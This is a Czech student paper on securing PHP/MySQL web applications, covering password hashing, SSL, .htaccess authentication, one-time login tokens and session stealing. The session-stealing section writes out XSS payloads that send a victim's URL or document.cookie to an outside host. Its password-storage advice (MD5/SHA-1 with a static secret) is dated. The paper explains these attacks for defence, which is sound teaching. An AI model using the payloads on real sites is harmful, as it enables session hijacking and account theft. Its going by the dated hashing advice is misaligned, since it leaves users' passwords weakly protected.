Zabezpečení webových aplikací

Rozměr: px
Začít zobrazení ze stránky:

Download "Zabezpečení webových aplikací"

Transkript

1 Středoškolská odborná činnost 2006/2007 Obor 10 elektrotechnika, elektronika, telekomunikace a technická informatika Zabezpečení webových aplikací Autor: Martin Šimeček SPŠ a VOŠ Písek, Karla Čapka 402, Písek, 4. ročník Konzultant práce: RNDr. Miroslav Procházka (SPŠ a VOŠ Písek) Písek, 2006 Českobudějovický kraj

2 Prohlašuji tímto, že jsem soutěžní práci vypracoval samostatně pod vedením RNDr. Miroslava Procházky a uvedl v seznamu literatury veškerou použitou literaturu a další informační zdroje včetně internetu. V Písku dne podpis 2

3 Anotace 1 Anotace S rozvojem internetu se zvětšuje i množství nejrůznějších dynamických webových stránek, přičemž se ovšem stále častěji zapomíná na zabezpečení. Cílem dokumentu je seznámit programátory webových aplikací se závažnými druhy útoků a zneužití jejich kódu a navrhnout účinná řešení. Zabývá se mimo jiné ochranou webové aplikace před útoky ze strany klienta (SQL Injection, Cross-Site Scripting...), zabezpečení soukromí uživatele - SSL šifrování (a jeho alternativy, pokud není dostupné), jeho pohyb po webu (session-stealing), ale i na první pohled neznatelnými děrami v podobě nechráněných souborů (Google hacking). Postupy, ukázky a hotová řešení jsou realizovány široce dostupným a oblíbeným jazykem PHP a databází MySQL. Teorie je doplněna názornými obrázky, příklady a přiloženou skutečnou aplikaci. 2 Obsah 1 Anotace 3 2 Obsah 3 3 Úvod 4 4 Soukromí uživatele Uchovávání informací o uživateli Heslo a samotné přihlášení MD SHA Autentifikace uživatele HTTPS a SSL Alternativa HTTP autentizace a.htaccess HTTP Autentizace Přenos informací o uživateli mezi stránkami Session stealing 15 5 Vstupy Vstupy do subsystémů Lístkový systém ový formulář SQL Injection Řídící vstupy Kontrola oprávnění Obecně 23 6 Výstup XSS PHP Include Injection 25 7 Další metody Logování (záznamy) Ochrana proti spamu Formulářový spam ový spam Upload souborů Google 31 8 Závěr - shrnutí 33 9 Použité zdroje a odkazy Přílohy Ukázkové aplikace Zabezpečená Nezabezpečná Skripty 39 3

4 Úvod 3 Úvod Uživatelsky orientovaný Internet, jak ho známe dnes, prošel rozsáhlým vývojem. Od původně zcela statických stránek, kde případná interakce s uživateli probíhala prostřednictvím u a jejichž aktualizace obnášela editaci příslušného HTML souboru na serveru (což mnohdy znamená soubor stáhnout, upravit a nahrát zpět). Až po dnešní rozsáhlé webové aplikace schraňující data desítek, stovek, tisíců a více uživatelů, zaměnitelné s desktopovým programem a reagující takřka okamžitě (technologie AJAX 1 ). S přibývajícími možnostmi tvořit dynamické víceuživatelské weby se zároveň objevilo velké množství potenciálních bezpečnostních děr. A kupodivu se to netýká jen malých aplikací pro desítky návštěvníků. Z poslední doby (podzim 2006) mohu jmenovat například projekt pripojtese.cz [1] (XSS 2 ) nebo takeit.cz [2] (SQL Injection 2 ). Napadení se nevyhnul ani webzine Živě.cz [3] (XSS 2 ). Na zabezpečení se tedy zapomíná. Přitom jeho zajištění není tak složité, jak by se mohlo zdát. Samozřejmě není možné poskytnout absolutní ochranu a zároveň uživatelskou přívětivost, ale je možné potenciálního útočníka zpomalit, ztížit mu snažení a zároveň neodradit uživatele. Tato práce se zaměřuje na používané útoky na webové aplikace a způsoby jejich eliminace. Zároveň nabízí jistý teoretický základ problematiky s odkazy na další zdroje. Záměrem bylo shrnout problém a navrhnout přijatelné řešení na jednom místě bez nutnosti procházet ohromné množství materiálů. Členění sleduje průchod uživatele aplikací - od registrace (uložení údajů), přes přihlášení, pohyb po webu, vkládání dat, až po jejich čtení. Následuje ochrana před ohrožením aplikace dalšími metodami (spamy, chybné inkluze apod.). Cílem je definovat základní bezpečností pravidla a postupy nejen pro začínající programátory, ale pro většinu vývojářů, která se s myšlenkou zabezpečení příliš nepotýkala. Větší přístupnosti odpovídá výběr použitých technologií - PHP a MySQL jsou velmi dostupné i na free webhostinzích, kde je může každý využívat zdarma (s jistými omezeními). Doplňuje je ještě JavaScript (jehož podpora je u nejpoužívanějších prohlížečů samozřejmá), který je stále používanější pro zpříjemnění práce s aplikacemi. Příležitostně využívanou technologií pak je nastavování Apache serveru a php.ini pomocí.htaccess. Z předchozího odstavce vyplývají i jisté vstupní znalosti potřebné k využití této práce. Patří mezi ně znalost syntaxe a přehled o základních konstruktech a funkcích HTML, PHP a JS, základní dotazy MySQL a jejich tvorba. Od věci není ani přehled o direktivách PHP a manipulaci s.htaccess. 1 Asynchronous JavaScript and XML - umožňuje zpracovávání požadavků uživatele bez opětovného stažení celé stránky (např. hlasování v anketě). Používá mj. Google mail. 2 Cross-site scripting, SQL Injection - formy útoku, budou rozebrány dále v textu. 4

5 Soukromí uživatele 4 Soukromí uživatele Ve víceuživatelských online aplikacích je třeba řešit několik základních úkonů: 1. uložení údajů 2. autentifikaci uživatele 3. přenos určitých informací o člověku mezi stránkami 4.1 Uchovávání informací o uživateli Hlavní síla dynamických webových aplikací je právě v práci s více uživateli. Nejčastěji probíhá tak, že člověk se zaregistruje, vybere si přihlašovací údaje (login a heslo) a případně vyplní doplňující informace o své osobě. Tato data jsou pak posléze k dispozici ostatním (např. kontakty na danou osobu) nebo je aplikace dál využívá (např. výběr země v online hře). Dostupnost databází (MySQL je již takřka standardem free webhostingů) přímo nabízí jejich použití za účelem uchování těchto údajů. Jsou optimalizované pro práci s daty a zároveň relativně chráněné před neautorizovaným přístupem (vynechme možnost prolomení přístupového hesla k databázi nebo SQL Injection a jiné zde popsané útoky). Co je v databázi, není neviditelné, proto je velmi nebezpečné ukládat hesla v čistém tvaru. Schopný útočník a děravá aplikace mohou vést k získání kompletního obsahu tabulky uživatelů, odkud pak stačí jen přečíst přihlašovací údaje a zneužít je. Navíc nikdy nevíme, kdo všechno bude mít k databázi přístup a kdo se na data podívá. Není v lidských silách používat důsledně pro každý server jiné heslo, a tak někteří mají heslo jediné, jiní několik řetězců, které mezi sebou střídají... Znamená to, že jakmile kdokoliv získá přihlašovací údaje na jeden server, může je zkusit použít i na jiných - a většinou mu to i vyjde. Hlavní zásadou tedy je neukládat hesla v databázi v tzv. čistém tvaru. Snažíme se zabránit jejich přečtení pouhým okem a zároveň znesnadnit útok hrubou silou. PHP i MySQL nabízejí funkce k jednosměrnému zahashování řetězce některým z k tomu určených algoritmů - jsou jimi MD5() a SHA1(). Tyto funkce na vstupu přijmou text na jehož základě vytvoří hash konstatní délky (nezáleží tedy na délce původního řetězce). MySQL: SELECT MD5( testing ); -> 'ae2b1fca515949e5d54fb22b8ed95575' PHP: md5( test ); -> '098f6bcd4621d373cade4e832627b4f6' I kdyby někdo získal přístup ke kompletní tabulce uživatelů, uvidí nanejvýš hashe jejich hesel (jejichž zneužití je minimální, nicméně reálné). Větší úrovně zabezpečení dosáhneme například kombinací loginu, hesla a tajného řetězce. Do databáze uložíme takto vytvořenou proměnnou $hash: $tajny = Kx6oVQl54 ; $hash = sha1($login.$heslo.$tajny); A při přihlášení pak znovu sestavíme tento řetězec pomocí údajů přijatých od uživatele a zkontrolujeme, zda $hash odpovídá údaji v databázi. Vyhneme se tak hned několika problémům: 1. I když budou mít dva uživatelé stejné heslo, jejich hashe se budou lišit - nelze tak pouhým pohledem na tabulku uživatelů zjistit, kdo má stejné heslo. 2. Souvisí s 1. - nemusíme vyžadovat jedinečná hesla (stačí uživatelská jména). Upozornění že heslo již je použito, zvolte jiné je mimochodem ohromné bezpečnostní riziko, protože stačí jenom s daným řetězcem zkoušet přihlášení na různá jména a je otázkou času, kdy se to povede. 3. Přidáním jedinečného řetězce $tajny je zajištěno, že hash bude jedinečný nejen pro uživatele, ale i pro server (aplikaci) - je tedy velmi nepravděpodobné, že útočník najde v databázi jiné aplikace stejné hashe. 5

6 Soukromí uživatele Na závěr povídání o uložení hesel ještě není od věci zmínit lidský faktor. Uživatelé mají tendenci volit taková hesla, která se dají dobře zapamatovat - smysluplná slova, žádné speciální znaky, minimum čísel, nestřídání velkých a malých písmen... Většinou tedy stačí použít slovníkový útok nebo zaútočit hrubou silou. Na tvůrci aplikace je pak zvolit kompromis mezi komfortem uživatele a bezpečností. Používané mechanismy jsou: 1. vynutit minimální délku hesla (7-9 znaků je dostačující) 2. vynutit používání malých/velkých písmen, číslic a speciálních znaků 3. vynutit periodickou změnu hesla 4. umožnit kdykoliv heslo změnit 5. uzamknout účet po několika (5-10) neúspěšných pokusech o přihlášení a odemykat ho ručně nebo po určité době Jejich kombinaci je třeba zvážit dle charakteru aplikace. Body 4 a 2 jsou použitelné vždy, naopak 3 může vést k tomu, že si uživatel bude hesla zapisovat nebo volit co nejjednodušší a stanou se tak lépe dostupná. Zapomenuté heslo Dál je třeba myslet na situaci, kdy uživatel heslo zapomene. U menších aplikací není problém, aby rozesílání nových hesel řídil sám administrátor, nicméně je lepší celý postup zautomatizovat. Jako celkem bezpečná cesta se jeví odeslání dočasného hesla na uvedený při registraci (například formou odkazu, jehož bude parametrem). Vzhledem k tomu, že i y jsou odchytitelné, musí mít toto jednorázové heslo omezenou platnost (v řádech hodin) a musí být okamžitě vyžádána jeho změna Heslo a samotné přihlášení Vyžadujeme-li zvlášť velkou úroveň zabezpečení, můžeme si při přihlášení po uživateli vyžádat pouze některé ze znaků jeho hesla. Jejich výběr se mění pochopitelně náhodně a zabraňuje tak získání hesla použitím např. keyloggeru na potenciálně nebezpečné stanici (internetová kavárna nebo v podstatě jakýkoliv počítač mimo naši správu). Tento způsob účinně používají některé banky. Razantně ovšem snižuje uživatelskou přívětivost a je třeba jeho použití důkladně zvážit MD5 Tento algoritmus byl vyvinut profesorem Ronaldem L. Rivestem (z Massachusetts Institute of Technology) v roce Zkratka znamená Message-Digest Algorithm 5. Přijímá na vstupu řetězec libovolné délky a vytváří jeho 128-bitový hash. Dříve se předpokládalo, že je neproveditelné počítačově vytvořit dva řetězce mající stejný hash nebo vytvořit jakýkoliv text mající předem určený hash. Při tvorbě hashe se používají mimo jiné bitové rotace a logické funkce a celá operace je jednosměrná není tedy možné použít reverzní způsob k získání původního řetězce. Algoritmus MD5 je určen pro digitální podepisování, kde musí být velký soubor zkomprimován z důvodu bezpečnosti, než je zašifrován privátním klíčem v public-key šiforvacích systémech (jako např. RSA). Používá se i jako způsob k ověření integrity dat nebo ukládání hesel. [12] V roce 1996 byla objevena vada v návrhu MD5, a i když nebyla zásadní, kryptologové začali raději doporučovat jiné algoritmy, jako je například SHA-1 (i když ani ten již dnes není považován za bezchybný). V roce 2004 byly nalezeny daleko větší chyby a od použití MD5 v bezpečnostních aplikacích se upouští. [11] Funkce pro jeho použití jsou implementovány v mnoha programovacích jazycích (seznam viz [12]). 6

7 4.1.3 SHA-1 Soukromí uživatele Algoritmus byl specifikován v roce 1995 Americkým Národním úřadem pro bezpečnost (NSA) a je postaven na stejných principech jako MD5. Generuje 160 bitový (40 znaků) hash z řetězce o maximální délce bitů. [18] uvádí následující příklad: SHA1("The quick brown fox jumps over the lazy dog") = 2fd4e1c6 7a2d28fc ed849ee1 bb76e739 1b93eb12 Bezpečnost byla zpochybněna, když se v roce 2005 podařil útok schopný získat kolizní řetězec za méně než 2 69 operací (pro hrubou sílu je potřeba 2 80 operací). [19] Pokročilejší variantou jsou algoritmy sdružené do skupiny SHA-2. Produkují delší hashe délka (v bitech) se odráží v jejich názvech: SHA-256, SHA-224, SHA-384 a SHA-512. U těchto ještě nebyly detekovány kolize. 4.2 Autentifikace uživatele Než může aplikace s uživatelem komunikovat, a otevřít mu např. přístup k části webu pro registrované, musí ověřit jeho totožnost. Existuje několik způsobů - my se vyhneme biometrickým čidlům a identifikačním kartám a použijeme oblíbené zadání jména (loginu) a hesla. Zaslaný login a heslo jsou porovnány s údaji v tabulce uživatelů a pokud dojde ke shodě, je osoba vpuštěna. Máme dvě možnosti, jak kýžené údaje vyžádat: formulářové přihlášení - používají podkapitoly a Klient pošle přihlašovací data jen jednou a následně používá pouze id relace (session), která mu přísluší. Aplikace si tak může sama zajišťovat odhlášení uživatele (cílené nebo timeout). - Samozřejmostí by mělo být používat pro zadání hesla pole typu password a jeho nevyplňování předem. - Metodou pro odeslání formuláře by měla být výhradně POST. Při použití GET jsou údaje jednoduše čitelné a zůstavají v historii prohlížeče. HTTP přihlášení, využívající možností protokolu - viz podkapitola Úskalím je v tomto kroku posílání zadaných informací po síti mezi prohlížečem a serverem. V nezašifrované podobě je heslo velmi jednoduše odchytitelné, proto je třeba ho upravit HTTPS a SSL Adresa stránky zabezpečené protokolem SSL (tedy s šifrovaným spojením) začíná https://. Mnohdy je zabezpeční indikováno prohlížečem (Opera v adresním řádku - obr. 1, Internet Explorer ve stavovém). Obr. 1 Upozornění na zabezpečnou stránku - Opera Standardní port pro komunikaci přes HTTPS/SSL je 443, standardní port HTTP je 80. [5] 7

8 Soukromí uživatele Obr. 2 SSL certifiát v IE Obr. 3 SSL certifikát v Opeře Protokol SSL zajišťuje bezpečné spojení mezi dvěma komunikujícími uzly. Jakmile se vymění bezpečné klíče, dochází k symetrickému šifrování. Takové spojení je navíc spolehlivé, protože přenos zprávy obsahuje kontrolu integrity dat prostřednictvím MAC (Message Authentication Code). [5] Průběh ustavení SSL spojení [6]: Klient pošle serveru požadavek na SSL spojení, spolu s různými doplňujícími informacemi (verze SSL, nastavení šifrování atd.). Server pošle klientovi odpověď na jeho požadavek, která obsahuje stejný typ informací a hlavně certifikát serveru. Podle přijatého certifikátu si klient ověří autentičnost serveru. Certifikát také obsahuje veřejný klíč serveru. Na základě dosud obdržených informací vygeneruje klient základ šifrovacího klíče, kterým se bude kódovat následná komunikace. Ten zakóduje veřejným klíčem serveru a pošle mu ho. 8

9 Soukromí uživatele Server použije svůj soukromý klíč k rozšifrování základu šifrovacího klíče. Z tohoto základu vygenerují jak server, tak klient hlavní šifrovací klíč. Klient a server si navzájem potvrdí, že od teď bude jejich komunikace šifrovaná tímto klíčem. Fáze handshake tímto končí. Je ustaveno zabezpečené spojení šifrované vygenerovaným šifrovacím klíčem. Aplikace od teď dál komunikují přes šifrované spojení. Například POST požadavek na server se do této doby neodešle. Díky této provázanosti klienta a serveru není možné komunikaci úspěšně odposlechnout ani do ní zasáhnout (MITM - man in the middle - člověk uprostřed komunikační cesty). Útočník by musel vytvořit vlastní pár veřejný/soukromý klíč a prostřednictvím něj komunikovat s klientem, ale na to by upozornil prohlížeč ( Certifikát je podepsán neznámou certifikační autoritou ). HTTPS se používá jako cílová stránka odeslání požadavku. Je samozřejmě možné provozovat celé stránky výhradně na HTTPS, ale protože většinou přesouváme citlivá data jen při konkrétních operacích (přihlášení, změna údajů, bankovní transakce apod.) je to zbytečně zpomalující. Ještě k certifikátům. Jedná se vlastně o digitálně podepsané veřejné klíče vydané buď certifikační autoritou (CA) - potom jsou v prohlížeči zobrazeny jako důvěryhodné, je-li daná autorita prohlížeči známa - nebo vlastní, u kterých bude uživatel upozorněn, že certifikát není důvěryhodný (Obr. 4) 3. Obr. 4 Upozornění na nedůvěryhodný certifikát - IE a Opera Každý prohlížeč má uložen seznam důvěryhodných CA (Obr. 5). Často se stává, že browser sice zobrazí upozornění, ale uživatel jej ignoruje a klepnutím na Pokračovat ustaví potenciálně nebezpečné SSL spojení. Nehledě na fakt, že ani certifikační společnosti nejsou neomylné. Je znám případ, kdy byl zkompromitován certifikát společnosti Microsoft a to přímo u VeriSignu, jedné z nejznámějších CA [9]. 3 IE 7 je v tomto ohledu ještě restriktivnější a nahrazuje žádanou stránku svou s upozorněním, že spojení není bezpečné. Uživatel pak musí potvrdit, že souhlasí kliknutím na odkaz cíle. 9

10 Soukromí uživatele Obr. 5 Seznam CA - Opera Další nebezpečí představuje podvržení certifikátu s podobným doménovým jménem. Útočník si může zaregistrovat doménu a imitovat tak stránku Pokud by byl důsledný, přiláká nic netušícího uživatele, ukáže mu totožnou stránku s přihlášením, jako na originální nase-banka.cz a dokonce mu podvrhne (svůj) certifikát vázaný na nasebanka.cz. Přehlédnout to je v tomto případě tak jednoduché... Shrnuto do několika vět, HTTPS je technologicky velmi bezpečný způsob, jak provozovat neodposlechnutelný kanál, který ovšem může být nevhodně použit. Podporuje-li ho náš hostingový server, není lepšího způsobu pro zabezpečení přihlášení uživatele Alternativa Pokud z nějakého důvodu nelze použít HTTPS (například jej nepodporuje hosting), můžeme se pokusit ho nahradit. Použitím metody salting 4 získáme hash hesla posílaný po síti s platností na jedno použití. Postup je následující: 1. Při zobrazení přihlašovacího formuláře vygeneruje server náhodnou sekvenci - token, kterou uloží do session a zároveň odešle klientovi. 2. Klient použije JavaScript a nejprve zahashuje do md5 (sha1) zadané heslo a následně tento řetězec spojí s tokenem a vytvoří nový hash, který se již odešle s formulářem. 3. Server zná heslo uživatele i token, takže jen provede stejný sled kroků jako klient - vytáhne z databáze hash hesla příslušného loginu a spojí ho s tokenem ve výsledný md5 (sha1) hash. 4. Nyní stačí jen porovnat přijaté heslo s vytvořeným. Pokud je platné, vygeneruje se nové id relace (funkce session_regenerate_id() ) a smaže se token (unset($_session['token']) ). Tím je zajištěna jednorázovost řetězce. I kdyby útočník zachytil posílané údaje (tedy hash hesla, token a session id), není schopen tyto údaje použít, protože v danou chvíli už neplatí. Výjimkou je technika Man in the middle, jejíž provedení je ale mnohem složitější a nestačí pouze odchytit pakety. 4 Tajný řetězec přisolíme jiným například náhodně vygenerovaným číslem (= salt) a toto spojení předáme hashovací funkci. K získání původního textu je tedy nutné znát i salt. Salting podstatně ztěžuje slovníkový útok a každý bit saltu navíc zdvojnásobuje výpočetní čas nutný pro prolomení. [16] 10

11 Soukromí uživatele Ukázka JS funkce, která zajišťuje generování jednorázového hashe: function SecureLogin(login_form) { /* Předpoklady: - formulář s <input type='password' name='pass' /> - vygenerovaný token v poli 'token' - includovaný soubor 'sha1.js' Použití: - vkládá se do onsubmit události formuláře - parametrem je document.[název formuláře] */ passw = hex_sha1(login_form.pass.value); sec_pass = hex_sha1(passw+login_form.token.value); login_form.pass.value = sec_pass; } Na získání SHA1 hashe používám skript z [14] poskytující funkci hex_sha1. PHP funkce zajišťující kontrolu přihlášení: /* Generuje nový token. Použije se ve formuláři k umístění do vlastnosti value pole token */ function TokenGenerate() { for ($i = 0; $i < 8; $i++) { $token.= rand(0,9); } $_SESSION['token'] = $token; return $token; } /* Kontroluje, zda souhlasí poslané heslo s databází. Nálsedně ošetřuje jednorázovost. */ function SafeLoginCheck($realpass,$sentpass) { if (sha1($realpass.$_session['token']) == $sentpass) { unset($_session['token']); session_regenerate_id(); return true; } else return false; } Obr. 6 Paket se zahashovaným heslem 11

12 Soukromí uživatele Nevýhodou tohoto postupu je pochopitelně fakt, že uživatel musí mít JS aktivovaný v prohlížeči. Pokud tomu tak nebude, aplikace by měla umožnit přihlášení i bez něho a uživatele na to upozornit HTTP autentizace a.htaccess Výše zmíněná řešení počítala se zpracováním $_POST požadavku přes PHP a následným ověřením v databázi. Existuje však ještě jeden velmi silný způsob ověření výborně použitelný zvlášť v případě, že máme pevně danou sestavu uživatelů (nebo se nečekají rozsáhlé změny, přidávání, mazání, apod...). Je jím HTTP autentizace pomocí.htaccess a.htpasswd dostupných v Apache web serveru [7]. Jak to probíhá? 1. Prohlížeč vyžádá zabezpečenou stránku 2. Webový server odpoví 401 Unauthorized a odešle hlavičku WWW-Authenticate 3. Prohlížeč se zeptá na jméno a heslo (Obr. 7 Autentizace v IE a Obr. 8 Autentizace v Opeře) 4. Prohlížeč vyžádá chráněnou stránku a přiloží přihlašovací údaje 5. Pokud jsou informace správné, odpoví server chráněnou stránkou, jinak vrátí 401 Authorisation required V praxi to vypadá tak, že určíme umístění souboru.htpasswd (z bezpečnostních důvodů by bylo lepší jej uložit nad hlavní složku našeho webu, aby nebyl zjistitelný výpisem souborů, ale to mnohdy - například na freehostingu - není možné) a jeho název (nemusí být nutně.htpasswd). Dále zvolíme název sekce, který se objeví v přihlašovacím okénku a typ autentizace. Vše uložíme do souboru.htaccess ve složce, kterou chceme chránit. AuthUserFile /absolutní cesta/.htpasswd AuthGroupFile /dev/null AuthName "Název sekce" AuthType Basic Require valid-user AuthUserFile: cesta k souboru s hesly AuthGroupFile: cesta k souboru s uživatelskými skupinami - v tomto případě se nepoužívá AuthName: identifikace zabezpečené sekce AuthType: použitá metoda Require: vyžadovaný uživatel - valid-user v tomto případě znamená kohokoliv z definovaného.htpasswd souboru K definování uživatelů v.htpasswd je možné použít utilitu htpasswd dodávanou k Apachi, nebo je zadat ručně, přičemž je třeba mít na paměti, že hesla musejí být zašifrována (PHP funkcí crypt(heslo) a to až na serveru, na němž bude zabezpečení použito - každý server šifruje jinak). Výsledný.htpasswd vypadá pak takto: uživatel1:zašifrované_heslo1 uživatel2:zašifrované_heslo2 uživatel3:zašifrované_heslo3 12

13 Soukromí uživatele Jakmile se uživatel pokusí přistoupit do zabezpečené složky, objeví se mu takovéto okno vyžadující zadání jména a hesla: Obr. 7 Autentizace v IE Obr. 8 Autentizace v Opeře Problémem u tohoto postupu je rychlost. Server musí kontrolovat uživatele při každém požadavku na zabezpečený dokument, obrázek v zabezpečené složce, atd... Znamená to projet řádek po řádku soubor.htpasswd a najít uživatelské jméno a zkontrolovat heslo. Při větší délce souboru s hesly to znamená značné zpomalení. Další nevýhodou je fakt, že tento způsob neumí logout, tedy odhlášení uživatele, a přihlašovací údaje se posílají neustále až do zavření okna prohlížeče. Dokumentace k Apache serveru doporučuje místo.htaccess použít direktivu <Directory> v http.conf. Postup je podobný. Více v manuálu [8]. Na závěr je třeba ještě podotknout, že přihlašovací údaje jsou mezi prohlížečem a serverem přenášeny v čisté podobě (použijeme-li AuthType Basic 5 - viz Obr. 9), resp. zakódované jednoduchým base64. A vzhledem k tomu, že se údaje přenášejí s každým požadavkem, je 5 Další možností (bezpečnější) je AuthType Digest. Je podporován v PHP od verze 5.1.0, jeho zpracování je složitější a je popsáno v manuálu [13]. 13

14 Soukromí uživatele mnohem jednodušší je zachytit. Použití HTTPS v tomto případě způsobí značný pokles výkonu (neustálá výměna certifikátů při každém požadavku). Obr. 9 - Basic autorizace.htaccess a jméno a heslo v čistém tvaru HTTP Autentizace Je alternativou k ověření uživatele poskytovaným Apache serverem a liší se v tom, že zadaná data zpracovává přímo naše aplikace, takže máme širší možnosti manipulace. Jednoduchý příklad v PHP [13]: <?php if (!isset($_server['php_auth_user'])) { header('www-authenticate: Basic realm="my Realm"'); header('http/ Unauthorized'); echo 'Text to send if user hits Cancel button'; exit; } else { echo "<p>hello {$_SERVER['PHP_AUTH_USER']}.</p>"; echo "<p>you entered {$_SERVER['PHP_AUTH_PW']} as your password.</p>"; }?> Zjistí, jestli je uživatel přihlášen. Pokud není, odešle prohlížeči hlavičku s žádostí o zobrazení přihlašovacího okýnka, které ponese název My Realm a zároveň upozorní, že není přihlášeno (401 Unauthorized). Kliknutím na Storno se zobrazí echo text, OK naopak vyvolá tutéž stránku (skript), ale už budou vyplněné proměnné PHP_AUTH_USER, PHP_AUTH_PW, a AUTH_TYPE (pro jméno, heslo a typ přihlášení), s kterými se pak dál může pracovat. Platí totéž, co pro omezenějšího bratříčka popsaného výše - přihlašovací údaje se posílají na každou stránku až do uzavření okna prohlížeče Přenos informací o uživateli mezi stránkami Jakmile je osoba programem rozpoznána, je žádoucí tento stav i zachovat a tím tedy např. dovolit přístup k neveřejným částem webu. Protokol HTTP je bezstavový, takže předané přihlašovací údaje po odeslání formuláře zapomene. Ukládání jména a hesla (případně úrovně oprávnění a dalších ) do cookies nebo posílání coby parametr adresy není bezpečné - není totiž problém je změnit, případně zachytit - proto se používají relace (sessions). Server vygeneruje jednoznačné session id (identifikátor relace), které klient obdrží a následně předává s každým požadavkem. Server pak jen porovná sessid se svou databází relací a klienta pozná. Session id by mělo být dle [27] nesnadno odhadnutelné a dostatečně dlouhé, aby se předešlo útoku hrubou silou (zkoušení různých řetezců dokud nebude zvolen správný). Proto jej představuje nejčastěji MD5 hash. Je uložen do proměnné PHPSESSID (SID, SESSID... záleží na nastavení session.name v php.ini) a předává se dvěma způsoby - v cookie nebo jako parametr URL. Cookies jsou doporučeny, ale PHP umožňuje obě varianty, protože ne vždy je podpora 6 Internet Explorer a Netscape mažou lokální cache okna při obdržení kódu 401 od serveru. Dá se toho využít pro odhlášení uživatele. 14

15 Soukromí uživatele cookies aktivována v prohlížeči. Zároveň dokáže PHP i automaticky přidávat phpsessid ke každé relativní URI (volba session.use_trans_sid v php.ini), takže není nutné ručně přepisovat odkazy a přidávat k nim konstantu SID (zajišťující vložení sessid) v případě vypnutých cookies. [15] Použití cookies se dá dokonce vynutit (session.use_only_cookies). Je to bezpečnější způsob, protože tolik nehrozí session stealing popsaný níže. V PHP se pro vytvoření realce používá funkce session_start(). Měla by předcházet jakémukoliv výstupu. Dále je automaticky vytvořeno superglobální pole $_SESSION, do něhož můžeme uložit libovolné proměnné (např. id uživatele, jeho oprávnění apod...) a to jejich prostým přiřazením. $_SESSION['level'] = 1 Pokud nejsou použity neperzistentní cookies (které prohlížeč ukládá pouze v RAM a jsou tedy ztraceny s uzavřením jeho okna), je rizikem uzavření okna prohlížeče bez ručního odhlášení z aplikace. Tím by na počítači zůstala otevřená session s nastaveným přihlášením a přistupovými oprávněními. Session mechanismus proto kontroluje prodlevu od posledního požadavku uživatele na server, a jestliže tato překročí danou mez, dojde k automatickému zrušení session. Toto chování může být i nepříjemné. Pokud uživatel píše dlouhý příspěvek (např. ) a vyprší mu před odesláním relace, objeví se místo odeslání zprávy přihlašovací formulář. Pracně napsaný text je pak ztracen. Aplikace by tedy měla rozepsaná data dočasně uložit a po opětovném přihlášení uživatele je obnovit. Další použitelnou funkcí je session_regenerate_id(). Je dobré ji volat po úspěšném přihlášení do aplikace, protože nahradí stávající session id nově vygenerovaným. Stávající identifikátor tak přestává být platný a je útočníkovi k ničemu Session stealing Je důležité si uvědomit, že samotný mechanismus session v sobě nemá zabudouvanou žádnou ochranu (např. vázání relace na IP adresu, salting, apod ). Pokud tedy používáme relace tak, jak jsou (což je na freehostingu celkem běžné), je jedinou podmínkou přístupu k relaci znát její session id. Hlavním cílem útoku je tedy jeho získání. Na programátorovi je zajistit odpovídající zabezpečení. Jakmile je relace zkompromitována, má útočník dočasný přístup k uživatelskému účtu. Pokud změní přístupové údaje (heslo, ...), získá tak přístup trvalý, nicméně jen zdánlivě - oběť si změny všimne při prvním pokusu o přihlášení a patrně ji nahlásí. Využívá-li se pro přihlášení (nebo pro případ zapomenutého hesla) metody otázka-odpověď ( Jméno matky za svobodna?, Oblíbené jídlo? apod...), je přístup trvalý i beze změn (dokud je neprovede sama oběť). [24] Ke zjištění sessid se používá několik způsobů. Přímému odečtení z monitoru by měla zabránit složitost a délka identifikátoru relace, odchycení (sniffu) nezabráníme nijak, ale je to specifický útok vyžadující, aby byl útočník s obětí na stejné síti (nebo měl zkrátka možnost odposlechnout její pakety). V dalším textu se ovšem zaměříme na vzdálené získání id. O těchto způsobech pojednává [10] a jsou to: Získání session PHP Nejjednodušším způsobem je podstrčit přihlášené oběti odkaz na web. Útočník jej vloží například na webový chat, naivní oběť klikne, prohlížeč předá skriptu referer 7 a skript jej zpracuje (z proměnné $_SERVER['HTTP_REFERRER'] vyčte kompletní URL a tedy i id relace - pokud je předáváno jako parametr metodou GET), čímž má útočník přístup k relaci. Tento 7 Neboli adresu, z které oběť přišla. 15

16 Soukromí uživatele postup vyžaduje akci uživatele a neošetření ze strany serveru. Obranou je totiž přesměrování. Nepouštět všechny odkazy mimo web přímo, ale redirectovat přes další skript nevyžadující přihlášení (nejlépe v novém okně), který odstraní session id a změní referer. Referer se dá získat i bez účasti oběti. Pokud aplikace dovoluje např. vkládat obrázky, dá se snadno zneužít faktu, že referer se posílá i s požadavkem na obrázek. Vložíme tedy obrázek, jehož zdrojem bude náš skript, s width i height = 0 (nebo libovolný vygenerovaný / podstrčený pomocí GD knihovny v PHP). Získání session JavaScript Je-li dovoleno interpretovat HTML kód, není nic jednoduššího než použít XSS (kap. 6.1) a JavaScriptem přesměrovat na útočnický skript document.location='http://web.cz/skript.php?url='+document.location; nebo otevřít v novém okně: window.open('http://web.cz/skript.php?url=' + document.location,'okno'); Cíl tak dostane adresu právě otevřeného okna (document.location). Používá-li aplikace cookies, nabízí JS další objekt - document.cookie. Tím lze zjistit obsah celé cookie (jak ukazuje Obr. 10) a dále ho zpracovat. Stačí jen oběti podstrčit odkaz se správným kódem v parametru. Obr. 10 Obsah cookie vypsaný pomocí XSS Kód pro ukradení cookie by pak vypadal třeba takto: <script>document.location='http://ciziweb.cz/?h='+document.cookie;</script> Řešení Jistou ochranu relace představuje vázat její identifikátor na klienta. Tedy omezit přístup k ní na jeho IP adresu, prohlížeč, referer... Bohužel, IP adresa není jednoznačným určitelem klienta (mnoho uživatelů je dnes skryto za jednou adresou poskytovatele, přes kterou přistupují do internetu), navíc se může během komunikace změnit, a proto může dojít k občasné nepřístupnosti aplikace. Kontrola refereru se zavádí z důvodu zajištění, že požadavek pochází opravdu z našeho webu a ne např. z localhostu útočníka. Není ale absolutní. Referer se vytváří na straně klienta a dá se tedy modifikovat, některé proxy ho filtrují kvůli zajištění soukromí a prohlížeče umožňují vypnout jeho odesílání. Lepší je proto zaměřit se na prevenci samotné krádeže sessid. Úzce s tím souvisí Cross-Site Scripting (XSS), který je popsán v kapitole 6.1. Tam jsou také navrženy metody jeho zabránění. 16

